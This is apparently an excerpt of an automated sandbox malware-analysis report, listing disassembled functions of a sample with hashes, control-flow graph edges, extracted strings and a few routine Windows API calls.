                                                                                                            • Instruction Fuzzy Hash: D61137B6804349DFDB10CF99C841BDEBBF4EF48320F148419E554A7210C73AA591DFA5
                                                                                                            Function 35F28650 Relevance: .7, Instructions: 709COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1eed5b46531ac5654e12126ab1667709b9ab71e56bc0a86e21493cd50703d18f
                                                                                                            • Instruction ID: c7a8a3d6b5472b1422e261ca88ab38eb7c394b55893157756c43eb8c89b4f11a
                                                                                                            • Opcode Fuzzy Hash: 1eed5b46531ac5654e12126ab1667709b9ab71e56bc0a86e21493cd50703d18f
                                                                                                            • Instruction Fuzzy Hash: 6472CDB8E052688FEB64DF69C984BDDBBB2BB49300F1485E9D409A7355DB309E81CF50
                                                                                                            Function 331EC638 Relevance: .3, Instructions: 320COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67fb1a458f4740b8b01bf4af2770f7e46eb1eab90f31b18bc065cba8ddb549ec
                                                                                                            • Instruction ID: 65d1aa1ff5baba823e48264478724dad74a585209b14445d1763d0486877f164
                                                                                                            • Opcode Fuzzy Hash: 67fb1a458f4740b8b01bf4af2770f7e46eb1eab90f31b18bc065cba8ddb549ec
                                                                                                            • Instruction Fuzzy Hash: F1E1D174E01258CFEB14CFA9C894B9DBBB2BF89300F2081AAD409B7395DB755A85CF54
                                                                                                            Function 331E03AF Relevance: .3, Instructions: 284COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4dd0ade1eca99a08de04b3a143715fa2013fbbcc480e22310089e7b9d0b9716f
                                                                                                            • Instruction ID: a40a24875db5452f560eb6bb9ba41473ffda8239e9da5b6c3bbffdd90f53b599
                                                                                                            • Opcode Fuzzy Hash: 4dd0ade1eca99a08de04b3a143715fa2013fbbcc480e22310089e7b9d0b9716f
                                                                                                            • Instruction Fuzzy Hash: C0D1CF74E01218CFEB14DFA9C994B9DBBB2FB88304F1081A9D809B7355DB759A82CF54
                                                                                                            Function 331E0C1A Relevance: .2, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f50ef6eb44c01838d690de7fa42f0679844aad419ff1cb291f2fa70f2b565f2
                                                                                                            • Instruction ID: 8850982fe16d181627b061014e3ea70089427f1b63904ac80e6577c7fcd31c67
                                                                                                            • Opcode Fuzzy Hash: 9f50ef6eb44c01838d690de7fa42f0679844aad419ff1cb291f2fa70f2b565f2
                                                                                                            • Instruction Fuzzy Hash: 6CA11274E00608CFEB10DFA9C984BDDBBB1FF89300F249269E448AB291DB759985CF54
                                                                                                            Function 331E0C28 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a9063f6bac2e972b52053bc45b838d66c553c7e2c6571e34ef1337918d2b61a2
                                                                                                            • Instruction ID: 82236271568bc418b24dd8cfeaf16c22093df5b34c696c6430a21f4a61b47765
                                                                                                            • Opcode Fuzzy Hash: a9063f6bac2e972b52053bc45b838d66c553c7e2c6571e34ef1337918d2b61a2
                                                                                                            • Instruction Fuzzy Hash: 38A11274E00608CFEB10DFA9C944B9DBBB1BF88300F209269E408BB2A1DB759985CF54
                                                                                                            Function 35F29D10 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 325ed094a77c90ce5db848aee58656d7080f0929500c5e42a8d228f98dcc854e
                                                                                                            • Instruction ID: ee9c419d5348e897a127cd70fcd521bc47b796efac8d04e7a0a257b3e571bdeb
                                                                                                            • Opcode Fuzzy Hash: 325ed094a77c90ce5db848aee58656d7080f0929500c5e42a8d228f98dcc854e
                                                                                                            • Instruction Fuzzy Hash: 83A1BEB4E052288FEB18CF6AC944B9DBBF2BF89300F14C5AAD409B7255DB744A85CF11
                                                                                                            Function 35F2A360 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6433c857906e81814282ceb378d04926c0fe90bd6c24f83ffb8bb0c188b2a999
                                                                                                            • Instruction ID: b29a4a2cd47d42b3d34d07ddbd0f6bfaaaca6f85efc832b8d45774e162df4f49
                                                                                                            • Opcode Fuzzy Hash: 6433c857906e81814282ceb378d04926c0fe90bd6c24f83ffb8bb0c188b2a999
                                                                                                            • Instruction Fuzzy Hash: E6A1A0B5E012188FEB18CF6AC944B9EBBF2BF89300F14C5AAD449B7255DB705A85CF11
                                                                                                            Function 35F296C8 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5db412dedc4b11612a0d612570f5123a88de0f722d233f338f3044ba2570bf3
                                                                                                            • Instruction ID: b30ed18c3976bf4bdc2b191020711ad971225e3ebba5c4eb412974d5135fb587
                                                                                                            • Opcode Fuzzy Hash: e5db412dedc4b11612a0d612570f5123a88de0f722d233f338f3044ba2570bf3
                                                                                                            • Instruction Fuzzy Hash: 68A190B5E012188FEB58CF6AC944B9EBBF2BF89300F14C5AAD409B7255DB345A85CF11
                                                                                                            Function 35F2A9B0 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b25d1ed4c4819b21b9f5ac58389ed0d06bc9a37259dfaf97895f10aaa611dd67
                                                                                                            • Instruction ID: fd4381c06f28fa0e0941737f411038b1985a8bf5527a7d57a8c5afb53193d80a
                                                                                                            • Opcode Fuzzy Hash: b25d1ed4c4819b21b9f5ac58389ed0d06bc9a37259dfaf97895f10aaa611dd67
                                                                                                            • Instruction Fuzzy Hash: F4A1A1B4E012188FEB18CF6AC944B9DBBF2BF89300F14C5AAD849B7255DB745A85CF14
                                                                                                            Function 331E0F6F Relevance: .2, Instructions: 202COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 68416709321d962f0b7166c16b93fe8bfa4e43649fab2d5af7e6b4873efa5e66
                                                                                                            • Instruction ID: a2b165546680acfef03c5ea98a765dc24dac5f24a452f1b61c44e2e739427d14
                                                                                                            • Opcode Fuzzy Hash: 68416709321d962f0b7166c16b93fe8bfa4e43649fab2d5af7e6b4873efa5e66
                                                                                                            • Instruction Fuzzy Hash: A291F074D00608CFEB10DFA9C988BDCBBB1BF49311F249269E449AB291DB759981CF54
                                                                                                            Function 35F2BA97 Relevance: .2, Instructions: 191COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1719936f54faad25f9091b5943473cb4569bf2f87016e1f09858f96ab3adb9d0
                                                                                                            • Instruction ID: 03cb145562b7af0c698cb4903114270cb34fd3a5679931848d0bc5ae40d0efba
                                                                                                            • Opcode Fuzzy Hash: 1719936f54faad25f9091b5943473cb4569bf2f87016e1f09858f96ab3adb9d0
                                                                                                            • Instruction Fuzzy Hash: AF81D6B8E006088FEB14DFA9D9506DDBBF2BF88310F249529D814BB399DB345942CF54
                                                                                                            Function 35F28640 Relevance: .2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93f62ee1c4fc6ee14beb20816d8606d574c451cc7085c6e69be197bb567ccc39
                                                                                                            • Instruction ID: ce007492c013ff118a1c8bbffcca741142a3d68ef187b702d65f9c4e521bd48a
                                                                                                            • Opcode Fuzzy Hash: 93f62ee1c4fc6ee14beb20816d8606d574c451cc7085c6e69be197bb567ccc39
                                                                                                            • Instruction Fuzzy Hash: 9E71BFB5D01268CFDB64CF6AC9847DDBBB2BB89300F1094AAD409B7254DB359A82CF50
                                                                                                            Function 35F2A9A0 Relevance: .2, Instructions: 164COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 415848181fcffc200d9919d679fc84a1bf59110b99f043341b3be0c00c542234
                                                                                                            • Instruction ID: ab656022f0a3950d7926901fc4e8b1596175e8f3306dd71aac9cd5955c3f35ab
                                                                                                            • Opcode Fuzzy Hash: 415848181fcffc200d9919d679fc84a1bf59110b99f043341b3be0c00c542234
                                                                                                            • Instruction Fuzzy Hash: 777194B4E006188FEB68CF6AC944B8DFAF2AF88300F14C5AAD40DB7255DB745A85CF50
                                                                                                            Function 35F296B8 Relevance: .2, Instructions: 162COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e50460df9cf13cc54e859949097b74e9cbde1e2b20a9137521f293922d6c097e
                                                                                                            • Instruction ID: 7732253c49da0e6a29a1977991366b8b538dfdf3916d792a3cdb2a7418444b3f
                                                                                                            • Opcode Fuzzy Hash: e50460df9cf13cc54e859949097b74e9cbde1e2b20a9137521f293922d6c097e
                                                                                                            • Instruction Fuzzy Hash: B27174B5E016188FEB58CF6AC944B9EFBF2AF89300F14C5AAD40DA7255DB344A85CF11
                                                                                                            Function 35F29D00 Relevance: .1, Instructions: 117COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0b24b1e1293b4073a3991d33578ae8aa1fda270c3731b9d95487f34db80ebf74
                                                                                                            • Instruction ID: 78c448a097c458e28bf53f50c3e1c4ea025648ff880562be583215f9d848146a
                                                                                                            • Opcode Fuzzy Hash: 0b24b1e1293b4073a3991d33578ae8aa1fda270c3731b9d95487f34db80ebf74
                                                                                                            • Instruction Fuzzy Hash: F24177B5E056188BEB58CF6BC9547C9FBF3AFC9200F04C1AAC54CA6265DB740A868F50
                                                                                                            Function 35F2A352 Relevance: .1, Instructions: 107COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ade5de90b872204ea0c382cdfd813f50d09d9a62f82fa9792f48557dd0d197c0
                                                                                                            • Instruction ID: ccd947d9a67b4c2b23c145ce66215873eaab503b7e3a8a8fae97138e6d09b122
                                                                                                            • Opcode Fuzzy Hash: ade5de90b872204ea0c382cdfd813f50d09d9a62f82fa9792f48557dd0d197c0
                                                                                                            • Instruction Fuzzy Hash: D14169B5E016188BEB58CF6BC9457CDFAF3AFC9300F04C1AAD50CA6264DB740A868F51
                                                                                                            Function 000D7458 Relevance: 29.5, Strings: 23, Instructions: 706COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 d7458-d7946 75 d794c-d795c 0->75 76 d7e98-d7ecd 0->76 75->76 77 d7962-d7972 75->77 80 d7ecf-d7ed4 76->80 81 d7ed9-d7ef7 76->81 77->76 79 d7978-d7988 77->79 79->76 82 d798e-d799e 79->82 83 d7fbe-d7fc3 80->83 93 d7f6e-d7f7a 81->93 94 d7ef9-d7f03 81->94 82->76 84 d79a4-d79b4 82->84 84->76 86 d79ba-d79ca 84->86 86->76 87 d79d0-d79e0 86->87 87->76 89 d79e6-d79f6 87->89 89->76 90 d79fc-d7a0c 89->90 90->76 92 d7a12-d7a22 90->92 92->76 95 d7a28-d7e97 92->95 99 d7f7c-d7f88 93->99 100 d7f91-d7f9d 93->100 94->93 101 d7f05-d7f11 94->101 99->100 107 d7f8a-d7f8f 99->107 108 d7f9f-d7fab 100->108 109 d7fb4-d7fb6 100->109 110 d7f36-d7f39 101->110 111 d7f13-d7f1e 101->111 107->83 108->109 121 d7fad-d7fb2 108->121 109->83 112 d7f3b-d7f47 110->112 113 d7f50-d7f5c 110->113 111->110 119 d7f20-d7f2a 111->119 112->113 125 d7f49-d7f4e 112->125 117 d7f5e-d7f65 113->117 118 d7fc4-d7fe6 113->118 117->118 122 d7f67-d7f6c 117->122 126 d7fe8 118->126 127 d7ff6 118->127 119->110 131 d7f2c-d7f31 119->131 121->83 122->83 125->83 126->127 129 d7fef-d7ff4 126->129 130 d7ff8-d7ff9 127->130 129->130 131->83
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (U$3X\$30a$3$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$.C2$NC2$$q$$q
                                                                                                            • API String ID: 0-1600392927
                                                                                                            • Opcode ID: 525d0e4594b7a49fe7fa3f55d3941be8a09e5602cfa1b28459a2b1e939cfd3e0
                                                                                                            • Instruction ID: 63c281c31564f5606b4af76f3ee4af1e74963054ae42ef8f3b3f76188d8ae826
                                                                                                            • Opcode Fuzzy Hash: 525d0e4594b7a49fe7fa3f55d3941be8a09e5602cfa1b28459a2b1e939cfd3e0
                                                                                                            • Instruction Fuzzy Hash: 99520434A0021C8FFB249BA4C855BAEB7B6EF88300F1081AAD10A7B765DF755E85DF51
                                                                                                            Function 36450971 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 679 36450971-36450a0f GetCurrentProcess 684 36450a11-36450a17 679->684 685 36450a18-36450a4c GetCurrentThread 679->685 684->685 686 36450a55-36450a89 GetCurrentProcess 685->686 687 36450a4e-36450a54 685->687 689 36450a92-36450aaa 686->689 690 36450a8b-36450a91 686->690 687->686 701 36450aad call 36450f31 689->701 702 36450aad call 36450b51 689->702 690->689 692 36450ab3-36450ae2 GetCurrentThreadId 694 36450ae4-36450aea 692->694 695 36450aeb-36450b4d 692->695 694->695 701->692 702->692
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 364509FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 36450A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36450A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 36450AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: a0ea31080311fd3664da9097ebfb98202c3c9027f5a43c20e41c8234a730a94e
                                                                                                            • Instruction ID: 6bcf0a9ba1bdb50756ee4d7104ab3676ccccdd1b194132765fd1e9d462e97c4f
                                                                                                            • Opcode Fuzzy Hash: a0ea31080311fd3664da9097ebfb98202c3c9027f5a43c20e41c8234a730a94e
                                                                                                            • Instruction Fuzzy Hash: C35166B4D003498FEB14DFAAC544BEEBBF1EF88304F208519E519B7260DB749941CB65
                                                                                                            Function 36450980 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 703 36450980-36450a0f GetCurrentProcess 707 36450a11-36450a17 703->707 708 36450a18-36450a4c GetCurrentThread 703->708 707->708 709 36450a55-36450a89 GetCurrentProcess 708->709 710 36450a4e-36450a54 708->710 712 36450a92-36450aaa 709->712 713 36450a8b-36450a91 709->713 710->709 724 36450aad call 36450f31 712->724 725 36450aad call 36450b51 712->725 713->712 715 36450ab3-36450ae2 GetCurrentThreadId 717 36450ae4-36450aea 715->717 718 36450aeb-36450b4d 715->718 717->718 724->715 725->715
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 364509FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 36450A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 36450A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 36450AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 23aa494587163e01a34e7b84b9d5fc4a894f593733c433c488b3465b83aa86b4
                                                                                                            • Instruction ID: 4e16c66bd36f98116fc767ed19b76069b13cb7ba0fb5b45bf1392a40e1f0926f
                                                                                                            • Opcode Fuzzy Hash: 23aa494587163e01a34e7b84b9d5fc4a894f593733c433c488b3465b83aa86b4
                                                                                                            • Instruction Fuzzy Hash: FC5156B4D002498FDB14DFAAC544BEEBBF1EF88300F208119E519B7360DB74A941CB65
                                                                                                            Function 000D8D90 Relevance: 4.1, Strings: 3, Instructions: 318COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$hK$3K$3
                                                                                                            • API String ID: 0-2949761055
                                                                                                            • Opcode ID: ed51ac7d5b74cc8b2f00a0ae7b38d6c492b3db7cbfd8992166bb0c16e2ae5eec
                                                                                                            • Instruction ID: 83bd5e0e95b4da7b49b87f4d232ff7663fd4e2f892888e99b565429a2e6b285a
                                                                                                            • Opcode Fuzzy Hash: ed51ac7d5b74cc8b2f00a0ae7b38d6c492b3db7cbfd8992166bb0c16e2ae5eec
                                                                                                            • Instruction Fuzzy Hash: 12C1A0706047468FDB15CF68C484ABEBBF6AF85300B15C5AAE445DB352DB35ED42CBA0
                                                                                                            Function 35F2D548 Relevance: 3.9, Strings: 3, Instructions: 149COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1278 35f2d548-35f2d66d 1297 35f2d673-35f2d6b9 1278->1297 1298 35f2d710-35f2d741 1278->1298 1303 35f2d6c4-35f2d70f 1297->1303 1304 35f2d6bb-35f2d6bf 1297->1304 1305 35f2d747-35f2d75e 1298->1305 1304->1303
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'q$4'q$49=^
                                                                                                            • API String ID: 0-634856703
                                                                                                            • Opcode ID: c356779e2feb4d16f5198680e7f5e5aec113386f22dbae74020f5a1d2d4460c5
                                                                                                            • Instruction ID: 2c54ada0118fa90b0294640d354a0e6e6b19b9033c73383d069a9d608bd69842
                                                                                                            • Opcode Fuzzy Hash: c356779e2feb4d16f5198680e7f5e5aec113386f22dbae74020f5a1d2d4460c5
                                                                                                            • Instruction Fuzzy Hash: DB51AF70E002099FDB04EFA8D865AEEBBB1FF89300F108665D405BB265DB75AD42CF91
                                                                                                            Function 000D4F00 Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2353 d4f00-d4f22 2354 d4f38-d4f43 2353->2354 2355 d4f24-d4f28 2353->2355 2358 d4f49-d4f4b 2354->2358 2359 d4feb-d5017 2354->2359 2356 d4f2a-d4f36 2355->2356 2357 d4f50-d4f57 2355->2357 2356->2354 2356->2357 2360 d4f59-d4f60 2357->2360 2361 d4f77-d4f80 2357->2361 2362 d4fe3-d4fe8 2358->2362 2365 d501e-d5076 2359->2365 2360->2361 2363 d4f62-d4f6d 2360->2363 2454 d4f82 call d4ef0 2361->2454 2455 d4f82 call d4f00 2361->2455 2363->2365 2366 d4f73-d4f75 2363->2366 2385 d5078-d507e 2365->2385 2386 d5085-d5097 2365->2386 2366->2362 2367 d4f88-d4f8a 2368 d4f8c-d4f90 2367->2368 2369 d4f92-d4f9a 2367->2369 2368->2369 2372 d4fad-d4fcc 2368->2372 2373 d4f9c-d4fa1 2369->2373 2374 d4fa9-d4fab 2369->2374 2379 d4fce-d4fd7 2372->2379 2380 d4fe1 2372->2380 2373->2374 2374->2362 2458 d4fd9 call d9f6d 2379->2458 2459 d4fd9 call d9eb0 2379->2459 2380->2362 2382 d4fdf 2382->2362 2385->2386 2388 d509d-d50a1 2386->2388 2389 d512b-d512d 2386->2389 2390 d50b1-d50be 2388->2390 2391 d50a3-d50af 2388->2391 2456 d512f call d52b8 2389->2456 2457 d512f call d52c8 2389->2457 2399 d50c0-d50ca 2390->2399 2391->2399 2392 d5135-d513b 2393 d513d-d5143 2392->2393 2394 d5147-d514e 2392->2394 2397 d51a9-d5208 2393->2397 2398 d5145 2393->2398 2413 d520f-d5233 2397->2413 2398->2394 2402 d50cc-d50db 2399->2402 2403 d50f7-d50fb 2399->2403 2411 d50dd-d50e4 2402->2411 2412 d50eb-d50f5 2402->2412 2404 d50fd-d5103 2403->2404 2405 d5107-d510b 2403->2405 2408 d5105 2404->2408 2409 d5151-d51a2 2404->2409 2405->2394 2410 d510d-d5111 2405->2410 2408->2394 2409->2397 2410->2413 2414 d5117-d5129 2410->2414 2411->2412 2412->2403 2422 d5239-d523b 2413->2422 2423 d5235-d5237 2413->2423 2414->2394 2426 d523d-d5241 2422->2426 2427 d524c-d524e 2422->2427 2425 d52b1-d52b4 2423->2425 2432 d5247-d524a 2426->2432 2433 d5243-d5245 2426->2433 2429 d5261-d5267 2427->2429 2430 d5250-d5254 2427->2430 2437 d5269-d5290 2429->2437 2438 d5292-d5294 2429->2438 2435 d525a-d525f 2430->2435 2436 d5256-d5258 2430->2436 2432->2425 2433->2425 2435->2425 2436->2425 2440 d529b-d529d 2437->2440 2438->2440 2444 d529f-d52a1 2440->2444 2445 d52a3-d52a5 2440->2445 2444->2425 2446 d52ae 2445->2446 2447 d52a7-d52ac 2445->2447 2446->2425 2447->2425 2454->2367 2455->2367 2456->2392 2457->2392 2458->2382 2459->2382
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hq$Hq
                                                                                                            • API String ID: 0-925789375
                                                                                                            • Opcode ID: 41e601d0e0ae2bd1fc7ac147b02974797fc551bddfb98cf4683a8119145dde32
                                                                                                            • Instruction ID: 9cca9271e94d350c3b86b2fd7fcce1f8598d390647e451a4b0baeadc24f669c9
                                                                                                            • Opcode Fuzzy Hash: 41e601d0e0ae2bd1fc7ac147b02974797fc551bddfb98cf4683a8119145dde32
